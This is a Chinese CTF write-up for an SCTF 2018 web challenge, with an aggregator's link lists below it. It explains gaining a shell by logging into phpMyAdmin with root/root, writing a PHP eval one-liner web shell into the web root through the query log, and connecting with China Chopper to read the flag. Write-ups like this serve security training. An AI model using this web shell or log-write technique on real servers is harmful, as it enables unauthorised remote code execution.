Writeup | SCTF2018 |CTF 比赛 |By Jas502n

其他 2018-06-26 13:48:46 阅读次数: 3

__________WEB_____________

0x01 easiest web – phpMyAdmin

Ps：思路弱口令（root / root）登陆phpmyadmin，利用日志功能进行getshell

送分题，轻松一下

http://47.97.214.247:20001/phpmyadmin

Alternate address：

http://218.245.4.98:20000/phpmyadmin

开启日志，写入一句话

查询sql语句

<?php @eval($_POST['cmd']);?>

日志写入到网站路径下的dasdasdas.php文件

然后就getshell

http://218.245.4.98:20000/dasdasdad.php

密码：cmd

菜刀连接

在C盘发现flag

sctf{31cf2213cc49605a30f07395d6e5b9c4}

0x02 新的建议板

猜你喜欢

转载自www.cnblogs.com/Jas502n/p/9228589.html

Writeup | SCTF2018 |CTF 比赛 |By Jas502n

ctf比赛misc writeup

N1CTF 2018 lipstick WriteUp (bugku——多彩)

CTF 湖湘杯 2018 WriteUp (部分)

2018 巅峰极客CTF misc writeup

N1CTF WEB WriteUp

从入门到放弃系列之 N1CTF2018 pwn vote writeup

CTF比赛

“百度杯”CTF比赛九月场 SQL-writeup

2019年CTF3月比赛记录（二）：UTCTF AeroCTF 部分题目writeup

2019年CTF3月比赛记录（一）：BSidesSF 2019 CTF_Web部分题目writeup与重解

2019年CTF4月比赛记录（一）：ENCRYPT CTF 部分Web题目writeup与重解

2019年CTF3月比赛记录（三）：ConfidenceCTF与Securinets CTF 部分题目writeup与重解

XJNU-CTF 2018 writeup v1.0

CTF [HCTF 2018]admin writeup Flask-session unicode

CTF [HCTF 2018]WarmUp writeup mb_substr()函数

CTF writeup -who are you?

ctf题目writeup（9）

ctf题目writeup（1）

ctf题目writeup（3）

ctf题目writeup（6）

ctf题目writeup（2）

ctf题目writeup（4）

ctf题目writeup（5）

ctf题目writeup（8）

ctf题目writeup（7）

NUC_CTF-writeup

南邮CTF - Writeup

CTF-60 writeup

CTF training WriteUp

今日推荐

富文本编辑器 Quill 2.0 重磅发布，特性、可靠性与开发者体验大幅提升

“开源信徒”周鸿祎开源360智脑大模型

周排行

VS2017编译opensmile具体过程和遇到的问题

PowerEnglish——mini-story3总结

微信小程序数据库获取字符串在view中显示换行

Java静态代码块/构造代码块/构造函数/静态变量/成员变量(相关示例)

Keras使用tensorflowjs部署demo

window下用git连接Github

图象的全变分和去噪

LeetCode刷题笔记--119. Pascal's Triangle II

【Linux】进程间通信 - 管道

polyA|ribo-minus|differentiated cell|Genetic heterogeneity

每日归档

2024-04-17(5)

2024-04-16(70)

2024-04-15(42)

2024-04-14(0)

2024-04-13(119)

2024-04-12(38)

2024-04-11(14)

2024-04-10(68)

2024-04-09(5)

2024-04-08(60)